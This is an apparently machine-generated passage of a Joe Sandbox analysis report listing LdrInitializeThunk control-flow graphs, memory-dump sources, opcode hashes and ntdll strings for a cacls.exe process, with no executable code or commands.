                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 281 3782bc0-3782bcc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 280 3782b90-3782b9c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 279 3782b80-3782b8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: cef5a82616edc2a67578e163b35a2dd27fcf702ffa8187cdabedd59942ec7085
                                                                                                                                                                                                                                  • Instruction ID: 57a14c64f2db4d04c70bf826ecb4b84739ba35c1d53ccb11a1ef50c3d2234de2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cef5a82616edc2a67578e163b35a2dd27fcf702ffa8187cdabedd59942ec7085
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F90023122100C52F900A1585504F46000587E2301F51C6ABA0118654DC725C8517532

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 274 3782a10-3782a1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 5c9c08d8ef4cdfc51e18762caf31ab80f4abcb5f9b87d6447abca6e584153c09
                                                                                                                                                                                                                                  • Instruction ID: bc299e879e439814a6dc728b3d65dbc34d10111bade6a0fe2c297ebe0220370d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c9c08d8ef4cdfc51e18762caf31ab80f4abcb5f9b87d6447abca6e584153c09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7900225231004122945E558170490B044597D7351391C6AAF140A590CC73188657332

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 276 3782ac0-3782acc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: bb59fbab2267e0ae29d50e143d2d3c0608c7212cc16fb04fe0d4e1eff0d64968
                                                                                                                                                                                                                                  • Instruction ID: 71674c579dd9ba38ce7b9be25d02fc8bf0979282f0901ed05bf7de52a9c56504
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb59fbab2267e0ae29d50e143d2d3c0608c7212cc16fb04fe0d4e1eff0d64968
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC90023162500C12F950B1585514B46000587D2301F51C6A6A0018654DC7658A5576B2

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 275 3782a80-3782a8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e38f49889c24ca803ac81be1a0739659436e8ca3f4a7a3961a29f19619dad1b3
                                                                                                                                                                                                                                  • Instruction ID: 4a532ad63c1e90a323c52313f8fd0b8b0f7f50ec1a98d38e095131938bacd635
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38f49889c24ca803ac81be1a0739659436e8ca3f4a7a3961a29f19619dad1b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71900261222004136905B1585514A16400A87E2201B51C6B6E1008590DC63588917136

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 273 37829f0-37829fc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 30bde5d5e043a16abb9a56a568ece90cdff6eab27de49bc8cd0bb36247a91893
                                                                                                                                                                                                                                  • Instruction ID: d9ca57f858dc94f6d66b060e090646ca794c8c2b8f8ce9caa5933855a98877b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30bde5d5e043a16abb9a56a568ece90cdff6eab27de49bc8cd0bb36247a91893
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F900225231004132905E5581704907004687D7351351C6B6F1009550CD73188617132
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 463b744e4b0b47af34a110f6c0feb081116463a0246a817ea24e7771053a6769
                                                                                                                                                                                                                                  • Instruction ID: dc218e8eb01e549f404874ac31788dcf78aa9b617033cb04a6835eb8236ddb98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463b744e4b0b47af34a110f6c0feb081116463a0246a817ea24e7771053a6769
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B90022123180452FA00A5685D14F07000587D2303F51C7AAA0148554CCA2588617532
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e011e138cce9e045414cb53cc41be790717b1b98ba4edc7679cd47f9fc40cb8f
                                                                                                                                                                                                                                  • Instruction ID: 168bd83a1e0f38893e67f6e2cd4eaef492fdd8b491d92f23b860988e0a9aae9c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e011e138cce9e045414cb53cc41be790717b1b98ba4edc7679cd47f9fc40cb8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0190026136100852F900A1585514F060005C7E3301F51C6AAE1058554DC729CC527137

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 284 3782d10-3782d1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 38d81a553d1e3d33eab99e33f6a521637a24d3c7fa777a6b9802e612027ccdce
                                                                                                                                                                                                                                  • Instruction ID: fc1b9587eed1e1e6f2dbdde7ce7940468c885fffb799e2fa5eca347ddce68904
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38d81a553d1e3d33eab99e33f6a521637a24d3c7fa777a6b9802e612027ccdce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6490023122100823F911A1585604B07000987D2241F91CAA7A0418558DD7668952B132

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 282 3782c30-3782c3c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 1aa16a468fd52f6eb64a1ac4014d3309134d68342728d03b5c2a058ec6635735
                                                                                                                                                                                                                                  • Instruction ID: b36ea6271b204ea917b1008b7f8b13a23af68a699207607b0e5f99daf3be558e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aa16a468fd52f6eb64a1ac4014d3309134d68342728d03b5c2a058ec6635735
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F390022923300412F980B1586508A0A000587D3202F91DAAAA0009558CCA2588697332

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 283 3782cf0-3782cfc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 90ef4ba2e6286a7dc54debbdd0ba583fdd92e159b32be0e4427153fc27220377
                                                                                                                                                                                                                                  • Instruction ID: ee43f31a663ed856a91ada8d7aa96b612230962bf82901e477572e077511f7c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90ef4ba2e6286a7dc54debbdd0ba583fdd92e159b32be0e4427153fc27220377
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94900221262045627D45F1585504907400697E2241791C6A7A1408950CC6369856F632

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 269 3782b2a-3782b2f 270 3782b3f-3782b46 LdrInitializeThunk 269->270 271 3782b31-3782b38 269->271
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 0b39c8ad8e7b7cd2434985af4f71e477ef5d76e0755421eeba68d547e3736ae4
                                                                                                                                                                                                                                  • Instruction ID: dca020b76b35e9ea5581e35856286057688ec0fbbea152c0f22c81889ab6fbea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b39c8ad8e7b7cd2434985af4f71e477ef5d76e0755421eeba68d547e3736ae4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAB02B318020C4C5FE00E720070CB073D0067C1301F15C5E2D1020280F8338C080F132
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182788854676.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2e00000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0f8c8a6c53fd1db66a41f1c260b2c0d689f48431a85abd57fd6f06673ad15012
                                                                                                                                                                                                                                  • Instruction ID: 03dd6b7a336daf5a7130827c824d1ef1fba9cac44895e0bf49f9571e2be75cdf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f8c8a6c53fd1db66a41f1c260b2c0d689f48431a85abd57fd6f06673ad15012
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1E0262B6AC1408687069B7944826C0FFE6DA9E60531C12ADC8DBC6729E292C80696C5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037B4507
                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 037B44AB
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037B4530
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037B4460
                                                                                                                                                                                                                                  • Execute=1, xrefs: 037B451E
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037B454D
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 037B4592
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                  • Opcode ID: 3dfcdd2328ff4c942052003454a022f3801ae8c15eed6c5da67b411add15c703
                                                                                                                                                                                                                                  • Instruction ID: f94a8255c79173bcef451e2432c8ec92171c57cfc0bac9eeb44775f74fdd2ca5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dfcdd2328ff4c942052003454a022f3801ae8c15eed6c5da67b411add15c703
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F51F771A40359BADF24EBA9DC89FFD77B8AF08740F0804E9D505AB181EB709A45CF61
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $$@